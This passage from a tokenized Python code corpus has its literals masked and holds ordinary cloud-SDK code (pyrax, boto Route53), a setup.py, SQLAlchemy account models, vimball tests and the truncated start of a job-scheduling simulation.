. results = self . list_method ( ) <EOL> else : <EOL> args = self . extra_args <EOL> self . results = self . _list_method ( self . next_uri , * args ) <EOL> self . next_uri = self . manager . _paging . get ( <EOL> self . paging_service , { } ) . get ( "<STR_LIT>" ) <EOL> try : <EOL> return self . results . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> raise StopIteration ( ) <EOL> class DomainResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list <EOL> self . _list_method = self . manager . _list <EOL> self . paging_service = "<STR_LIT>" <EOL> class SubdomainResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list_subdomains <EOL> self . _list_method = self . manager . _list_subdomains <EOL> self . extra_args = ( self . domain_id , ) <EOL> self . 
paging_service = "<STR_LIT>" <EOL> class RecordResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list_records <EOL> self . _list_method = self . manager . _list_records <EOL> self . paging_service = "<STR_LIT>" </s>
<s> from __future__ import print_function <EOL> import os <EOL> import six <EOL> import sys <EOL> import pyrax <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> cs = pyrax . cloudservers <EOL> cbs = pyrax . cloud_blockstorage <EOL> try : <EOL> server = cs . servers . find ( name = "<STR_LIT>" ) <EOL> except cs . exceptions . NotFound as e : <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> prompt = "<STR_LIT>" <EOL> answer = six . moves . input ( prompt ) <EOL> if answer . lower ( ) . startswith ( "<STR_LIT:y>" ) : <EOL> ubu_image = [ img for img in cs . images . list ( ) <EOL> if "<STR_LIT>" in img . name ] [ <NUM_LIT:0> ] <EOL> flavor_1GB = [ flavor for flavor in cs . flavors . list ( ) <EOL> if flavor . ram == <NUM_LIT> ] [ <NUM_LIT:0> ] <EOL> print ( "<STR_LIT>" ) <EOL> server = cs . servers . create ( "<STR_LIT>" , ubu_image . id , flavor_1GB . id ) <EOL> print ( "<STR_LIT>" ) <EOL> pyrax . utils . wait_until ( server , "<STR_LIT:status>" , "<STR_LIT>" , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> else : <EOL> sys . exit ( ) <EOL> vol = cbs . create ( name = "<STR_LIT>" , size = <NUM_LIT:100> , volume_type = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , vol . name ) <EOL> print ( "<STR_LIT>" , server ) <EOL> print ( "<STR_LIT>" ) <EOL> vol . attach_to_instance ( server , mountpoint = "<STR_LIT>" ) <EOL> pyrax . utils . wait_until ( vol , "<STR_LIT:status>" , "<STR_LIT>" , interval = <NUM_LIT:3> , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> print ( "<STR_LIT>" , vol . attachments ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> vol . detach ( ) <EOL> pyrax . utils . wait_until ( vol , "<STR_LIT:status>" , "<STR_LIT>" , interval = <NUM_LIT:3> , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> print ( "<STR_LIT>" , vol . attachments ) <EOL> vol . delete ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import pyrax <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> clb = pyrax . cloud_loadbalancers <EOL> node = clb . Node ( address = "<STR_LIT>" , port = <NUM_LIT> , condition = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , node <EOL> ) <EOL> node_default = clb . Node ( address = "<STR_LIT>" , port = <NUM_LIT> ) <EOL> print ( "<STR_LIT>" , node_default ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import pyrax <EOL> import pyrax . exceptions as exc <EOL> import pyrax . utils as utils <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> cf = pyrax . cloudfiles <EOL> cont_name = pyrax . utils . random_ascii ( <NUM_LIT:8> ) <EOL> cont = cf . create_container ( cont_name ) <EOL> text = """<STR_LIT>""" <EOL> with utils . SelfDeletingTempfile ( ) as tmpname : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( text ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> with open ( tmpname , "<STR_LIT:w>" ) as tmp : <EOL> tmp . write ( text ) <EOL> nm = os . path . basename ( tmpname ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" % nm ) <EOL> cf . upload_file ( cont , tmpname , content_type = "<STR_LIT>" ) <EOL> obj = cont . get_object ( nm ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" , obj ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( obj . get ( ) ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> <EOL> ) <EOL> cont . delete ( True ) </s>
<s> from setuptools import setup <EOL> from setuptools . command . sdist import sdist as _sdist <EOL> import re <EOL> import sys <EOL> import time <EOL> import codecs <EOL> import subprocess <EOL> if sys . version < "<STR_LIT>" : <EOL> from distutils . dist import DistributionMetadata <EOL> DistributionMetadata . classifiers = None <EOL> DistributionMetadata . download_url = None <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as vfile : <EOL> version_text = vfile . read ( ) <EOL> vmatch = re . search ( r'<STR_LIT>' , version_text ) <EOL> version = vmatch . groups ( ) [ <NUM_LIT:0> ] <EOL> release = '<STR_LIT:0>' <EOL> class sdist ( _sdist ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> global version <EOL> global release <EOL> git_head = subprocess . Popen ( "<STR_LIT>" , <EOL> shell = True , <EOL> stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] . strip ( ) <EOL> date = time . strftime ( "<STR_LIT>" , time . gmtime ( ) ) <EOL> git_release = "<STR_LIT>" % ( date , git_head ) <EOL> spec_in = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> spec = open ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> for line in spec_in . xreadlines ( ) : <EOL> if "<STR_LIT>" in line : <EOL> line = line . replace ( "<STR_LIT>" , version ) <EOL> elif "<STR_LIT>" in line : <EOL> if release . startswith ( '<STR_LIT:0>' ) : <EOL> release += '<STR_LIT:.>' + git_release <EOL> line = line . replace ( "<STR_LIT>" , release ) <EOL> spec . write ( line ) <EOL> spec_in . close ( ) <EOL> spec . close ( ) <EOL> _sdist . run ( self ) <EOL> try : <EOL> f = codecs . open ( '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' ) <EOL> long_description = f . read ( ) <EOL> f . 
close ( ) <EOL> except : <EOL> long_description = '<STR_LIT>' <EOL> testing_requires = [ "<STR_LIT>" ] <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = version , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> license = '<STR_LIT>' , <EOL> keywords = "<STR_LIT>" , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + testing_requires , <EOL> packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> cmdclass = { '<STR_LIT>' : sdist } <EOL> ) </s>
<s> from __future__ import print_function <EOL> from sparki_learning import * <EOL> import math <EOL> init ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> setPosition ( - <NUM_LIT:5> , <NUM_LIT> ) <EOL> drawFunction ( lambda x : x ** <NUM_LIT:2> , flrange ( - <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> print ( "<STR_LIT>" ) <EOL> setPosition ( <NUM_LIT> , <NUM_LIT:0> ) <EOL> drawFunction ( lambda x : math . sin ( x ) , flrange ( <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ) , <NUM_LIT:5> ) </s>
<s> from sqlalchemy import Column , ForeignKey , Integer , Float , String <EOL> from sqlalchemy . sql . expression import asc , desc , or_ , and_ <EOL> from sqlalchemy . orm import aliased <EOL> from db . database import db_session <EOL> from db . database import Base <EOL> from models . users import UsersTable <EOL> from utils import * <EOL> class Accounts ( object ) : <EOL> object = None <EOL> def __init__ ( self , user_id , user_type = None ) : <EOL> if not user_type : <EOL> user_type = '<STR_LIT>' if UsersTable . query . filter ( and_ ( UsersTable . id == user_id , UsersTable . is_private == True ) ) . first ( ) else '<STR_LIT>' <EOL> if user_type == '<STR_LIT>' : <EOL> self . object = NormalUserAccounts ( user_id ) <EOL> else : <EOL> self . object = PrivateUserAccounts ( user_id ) <EOL> def __getattr__ ( self , name ) : <EOL> print "<STR_LIT>" , name , '<STR_LIT>' , self . object <EOL> return getattr ( self . object , name ) <EOL> class AccountsBase ( ) : <EOL> user_id = None <EOL> accounts = None <EOL> accounts_and_loans = None <EOL> transfers = None <EOL> alias1 = None <EOL> alias2 = None <EOL> transfer = None <EOL> def __init__ ( self , user_id ) : <EOL> self . user_id = user_id <EOL> def get_accounts ( self ) : <EOL> if not self . accounts : <EOL> self . accounts = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type != "<STR_LIT>" ) . order_by ( asc ( AccountsTable . type ) ) . order_by ( asc ( AccountsTable . id ) ) <EOL> return self . accounts <EOL> def get_accounts_and_loans ( self ) : <EOL> if not self . accounts_and_loans : <EOL> self . accounts_and_loans = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . balance != <NUM_LIT:0> ) . outerjoin ( ( UsersTable , AccountsTable . name == UsersTable . id ) ) . add_columns ( UsersTable . name , UsersTable . slug ) . order_by ( asc ( AccountsTable . type ) ) . order_by ( asc ( AccountsTable . 
id ) ) <EOL> return self . accounts_and_loans <EOL> def change_account_balance ( self , account_id , amount ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance = float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_account_balance ( self , account_id , amount ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_user_balance ( self , amount , account_id = None ) : <EOL> if not account_id : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type != "<STR_LIT>" ) . order_by ( asc ( AccountsTable . id ) ) . first ( ) <EOL> else : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_loan_balance ( self , amount , with_user_id ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type == "<STR_LIT>" ) . filter ( AccountsTable . name == with_user_id ) . first ( ) <EOL> if not a : <EOL> a = AccountsTable ( self . user_id , with_user_id , '<STR_LIT>' , float ( amount ) ) <EOL> else : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def get_default_account ( self ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . order_by ( asc ( AccountsTable . id ) ) . first ( ) <EOL> if a : return a . id <EOL> def add_default_account ( self ) : <EOL> a = AccountsTable ( self . user_id , "<STR_LIT>" , '<STR_LIT:default>' , <NUM_LIT:0> ) <EOL> db_session . add ( a ) <EOL> db_session . 
commit ( ) <EOL> return a . id <EOL> def add_account ( self , name , type , balance ) : <EOL> a = AccountsTable ( self . user_id , name , type , balance ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def is_account ( self , account_id = None , account_slug = None ) : <EOL> accounts = self . get_accounts ( ) <EOL> if account_id : <EOL> for acc in accounts : <EOL> if acc . id == int ( account_id ) : <EOL> return acc . id <EOL> elif account_slug : <EOL> for acc in accounts : <EOL> if acc . slug == account_slug : <EOL> return acc . id <EOL> def add_account_transfer ( self , date , deduct_from_account , credit_to_account , amount ) : <EOL> t = AccountTransfersTable ( self . user_id , date , deduct_from_account , credit_to_account , amount ) <EOL> db_session . add ( t ) <EOL> db_session . commit ( ) <EOL> def edit_account_transfer ( self , date , deduct_from_account , credit_to_account , amount , transfer_id ) : <EOL> t = self . get_transfer ( transfer_id ) <EOL> if t : <EOL> t . date , t . from_account , t . to_account , t . amount = date , deduct_from_account , credit_to_account , amount <EOL> db_session . add ( t ) <EOL> db_session . commit ( ) <EOL> return t <EOL> def get_account_transfers ( self , date_from = None , date_to = None , account_slug = None ) : <EOL> if not self . transfers : <EOL> self . alias1 , self . alias2 = aliased ( AccountsTable ) , aliased ( AccountsTable ) <EOL> self . transfers = AccountTransfersTable . query . filter ( AccountTransfersTable . user == self . user_id ) . order_by ( desc ( AccountTransfersTable . date ) ) . order_by ( desc ( AccountTransfersTable . id ) ) . join ( <EOL> ( self . alias1 , ( AccountTransfersTable . from_account == self . alias1 . id ) ) , ( self . alias2 , ( AccountTransfersTable . to_account == self . alias2 . id ) ) ) . add_columns ( self . alias1 . name , self . alias1 . slug , self . alias2 . name , self . alias2 . slug ) <EOL> if date_from and date_to : <EOL> self . transfers = self . 
transfers . filter ( AccountTransfersTable . date >= date_from ) . filter ( AccountTransfersTable . date <= date_to ) <EOL> if account_slug : <EOL> self . transfers = self . transfers . filter ( or_ ( self . alias1 . slug == account_slug , self . alias2 . slug == account_slug ) ) <EOL> return self . transfers <EOL> def get_transfer ( self , transfer_id ) : <EOL> if not self . transfer or self . transfer . id != transfer_id : <EOL> self . transfer = AccountTransfersTable . query . filter ( and_ ( AccountTransfersTable . user == self . user_id , AccountTransfersTable . id == transfer_id ) ) . first ( ) <EOL> return self . transfer <EOL> def delete_transfer ( self , transfer_id ) : <EOL> AccountTransfersTable . query . filter ( and_ ( AccountTransfersTable . user == self . user_id , AccountTransfersTable . id == transfer_id ) ) . delete ( ) <EOL> db_session . commit ( ) <EOL> class NormalUserAccounts ( AccountsBase ) : <EOL> pass <EOL> class PrivateUserAccounts ( AccountsBase ) : <EOL> def modify_loan_balance ( self , amount , with_user_id ) : <EOL> return None <EOL> class AccountsTable ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:100> ) ) <EOL> type = Column ( String ( <NUM_LIT:100> ) ) <EOL> balance = Column ( Float ( precision = <NUM_LIT:2> ) ) <EOL> slug = Column ( String ( <NUM_LIT:100> ) ) <EOL> def __init__ ( self , user = None , name = None , type = None , balance = None ) : <EOL> self . user = user <EOL> self . name = name <EOL> self . type = type <EOL> self . balance = balance <EOL> self . 
slug = slugify ( name ) if type == '<STR_LIT>' or type == '<STR_LIT>' else None <EOL> class AccountTransfersTable ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> date = Column ( Integer ) <EOL> from_account = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> to_account = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> amount = Column ( Float ( precision = <NUM_LIT:2> ) ) <EOL> def __init__ ( self , user = None , date = None , from_account = None , to_account = None , amount = None ) : <EOL> self . user = user <EOL> self . date = date <EOL> self . from_account = from_account <EOL> self . to_account = to_account <EOL> self . amount = amount </s>
<s> import os <EOL> import stat <EOL> from tempfile import NamedTemporaryFile , TemporaryDirectory <EOL> from unittest . mock import patch <EOL> from pytest import raises <EOL> from vimball . base import Vimball , mkdir_p , is_vimball , ArchiveError <EOL> def test_mkdir_p ( ) : <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> for path in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> new_path = os . path . join ( tmpdir , path ) <EOL> assert not os . path . exists ( new_path ) <EOL> mkdir_p ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> new_path = os . path . join ( tmpdir , '<STR_LIT>' ) <EOL> os . mkdir ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> mkdir_p ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> path = os . path . join ( tmpdir , '<STR_LIT>' ) <EOL> os . mkdir ( path ) <EOL> os . chmod ( path , stat . S_IREAD ) <EOL> with raises ( OSError ) : <EOL> new_path = os . path . join ( path , '<STR_LIT>' ) <EOL> mkdir_p ( new_path ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> with raises ( OSError ) : <EOL> mkdir_p ( tmpfile . name ) <EOL> def is_vimball ( ) : <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( b'<STR_LIT>' ) <EOL> tmpfile . flush ( ) <EOL> assert not is_vimball ( tmpfile . name ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( '<STR_LIT>' ) <EOL> tmpfile . flush ( ) <EOL> assert is_vimball ( tmpfile . name ) <EOL> def test_vimball ( ) : <EOL> with raises ( ArchiveError ) : <EOL> Vimball ( '<STR_LIT>' ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( b'<STR_LIT>' ) <EOL> with raises ( ArchiveError ) : <EOL> Vimball ( tmpfile . name ) <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as tmpfile : <EOL> filename = os . path . basename ( tmpfile . name ) <EOL> tmpfile . write ( '<STR_LIT>' ) <EOL> tmpfile . 
flush ( ) <EOL> v = Vimball ( tmpfile . name ) <EOL> assert list ( v . files ) == [ ] </s>
<s> class HealthCheck ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_point = None , interval = <NUM_LIT:30> , target = None , <EOL> healthy_threshold = <NUM_LIT:3> , timeout = <NUM_LIT:5> , unhealthy_threshold = <NUM_LIT:5> ) : <EOL> self . access_point = access_point <EOL> self . interval = interval <EOL> self . target = target <EOL> self . healthy_threshold = healthy_threshold <EOL> self . timeout = timeout <EOL> self . unhealthy_threshold = unhealthy_threshold <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . target <EOL> def startElement ( self , name , attrs , connection ) : <EOL> return None <EOL> def endElement ( self , name , value , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . interval = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . target = value <EOL> elif name == '<STR_LIT>' : <EOL> self . healthy_threshold = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . timeout = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . unhealthy_threshold = int ( value ) <EOL> else : <EOL> setattr ( self , name , value ) <EOL> def update ( self ) : <EOL> if not self . access_point : <EOL> return <EOL> new_hc = self . connection . configure_health_check ( self . access_point , self ) <EOL> self . interval = new_hc . interval <EOL> self . target = new_hc . target <EOL> self . healthy_threshold = new_hc . healthy_threshold <EOL> self . unhealthy_threshold = new_hc . unhealthy_threshold <EOL> self . timeout = new_hc . timeout </s>
<s> import xml . sax <EOL> import time <EOL> import uuid <EOL> import urllib <EOL> import boto <EOL> from boto . connection import AWSAuthConnection <EOL> from boto import handler <EOL> from boto . resultset import ResultSet <EOL> import boto . jsonresponse <EOL> import exception <EOL> import hostedzone <EOL> HZXML = """<STR_LIT>""" <EOL> class Route53Connection ( AWSAuthConnection ) : <EOL> DefaultHost = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> Version = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> XMLNameSpace = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , aws_access_key_id = None , aws_secret_access_key = None , <EOL> port = None , proxy = None , proxy_port = None , <EOL> host = DefaultHost , debug = <NUM_LIT:0> ) : <EOL> AWSAuthConnection . __init__ ( self , host , <EOL> aws_access_key_id , aws_secret_access_key , <EOL> True , port , proxy , proxy_port , debug = debug ) <EOL> def _required_auth_capability ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def make_request ( self , action , path , headers = None , data = '<STR_LIT>' , params = None ) : <EOL> if params : <EOL> pairs = [ ] <EOL> for key , val in params . iteritems ( ) : <EOL> if val is None : continue <EOL> pairs . append ( key + '<STR_LIT:=>' + urllib . quote ( str ( val ) ) ) <EOL> path += '<STR_LIT:?>' + '<STR_LIT:&>' . join ( pairs ) <EOL> return AWSAuthConnection . make_request ( self , action , path , headers , data ) <EOL> def get_all_hosted_zones ( self , start_marker = None , zone_list = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if start_marker : <EOL> params = { '<STR_LIT>' : start_marker } <EOL> response = self . make_request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . Version , <EOL> params = params ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . 
Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> if zone_list : <EOL> e [ '<STR_LIT>' ] [ '<STR_LIT>' ] . extend ( zone_list ) <EOL> while e [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> next_marker = e [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> zone_list = e [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> e = self . get_all_hosted_zones ( next_marker , zone_list ) <EOL> return e <EOL> def get_hosted_zone ( self , hosted_zone_id ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def create_hosted_zone ( self , domain_name , caller_ref = None , comment = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if caller_ref is None : <EOL> caller_ref = str ( uuid . uuid4 ( ) ) <EOL> params = { '<STR_LIT:name>' : domain_name , <EOL> '<STR_LIT>' : caller_ref , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT>' : self . XMLNameSpace } <EOL> xml = HZXML % params <EOL> uri = '<STR_LIT>' % self . Version <EOL> response = self . make_request ( '<STR_LIT:POST>' , uri , <EOL> { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , xml ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status == <NUM_LIT> : <EOL> e = boto . jsonresponse . Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> else : <EOL> raise exception . 
DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> def delete_hosted_zone ( self , hosted_zone_id ) : <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status not in ( <NUM_LIT:200> , <NUM_LIT> ) : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def get_all_rrsets ( self , hosted_zone_id , type = None , <EOL> name = None , identifier = None , maxitems = None ) : <EOL> """<STR_LIT>""" <EOL> from boto . route53 . record import ResourceRecordSets <EOL> params = { '<STR_LIT:type>' : type , '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : identifier , '<STR_LIT>' : maxitems } <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri , params = params ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> rs = ResourceRecordSets ( connection = self , hosted_zone_id = hosted_zone_id ) <EOL> h = handler . XmlHandler ( rs , self ) <EOL> xml . sax . parseString ( body , h ) <EOL> return rs <EOL> def change_rrsets ( self , hosted_zone_id , xml_body ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:POST>' , uri , <EOL> { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , <EOL> xml_body ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . 
reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def get_change ( self , change_id ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , change_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import math <EOL> import numpy <EOL> import random <EOL> import Queue <EOL> from util import Job , TaskDistributions <EOL> MEDIAN_TASK_DURATION = <NUM_LIT:100> <EOL> NETWORK_DELAY = <NUM_LIT:0.5> <EOL> TASKS_PER_JOB = <NUM_LIT:100> <EOL> SLOTS_PER_WORKER = <NUM_LIT:4> <EOL> TOTAL_WORKERS = <NUM_LIT> <EOL> PROBE_RATIO = <NUM_LIT:2> <EOL> def get_percentile ( N , percent , key = lambda x : x ) : <EOL> if not N : <EOL> return <NUM_LIT:0> <EOL> k = ( len ( N ) - <NUM_LIT:1> ) * percent <EOL> f = math . floor ( k ) <EOL> c = math . ceil ( k ) <EOL> if f == c : <EOL> return key ( N [ int ( k ) ] ) <EOL> d0 = key ( N [ int ( f ) ] ) * ( c - k ) <EOL> d1 = key ( N [ int ( c ) ] ) * ( k - f ) <EOL> return d0 + d1 <EOL> def plot_cdf ( values , filename ) : <EOL> values . sort ( ) <EOL> f = open ( filename , "<STR_LIT:w>" ) <EOL> for percent in range ( <NUM_LIT:100> ) : <EOL> fraction = percent / <NUM_LIT> <EOL> f . write ( "<STR_LIT>" % ( fraction , get_percentile ( values , fraction ) ) ) <EOL> f . close ( ) <EOL> class Event ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def run ( self , current_time ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class JobArrival ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , simulation , interarrival_delay , task_distribution ) : <EOL> self . simulation = simulation <EOL> self . interarrival_delay = interarrival_delay <EOL> self . task_distribution = task_distribution <EOL> def run ( self , current_time ) : <EOL> job = Job ( TASKS_PER_JOB , current_time , self . task_distribution , MEDIAN_TASK_DURATION ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % ( job . id , current_time ) ) <EOL> new_events = self . simulation . send_probes ( job , current_time ) <EOL> arrival_delay = random . expovariate ( <NUM_LIT:1.0> / self . 
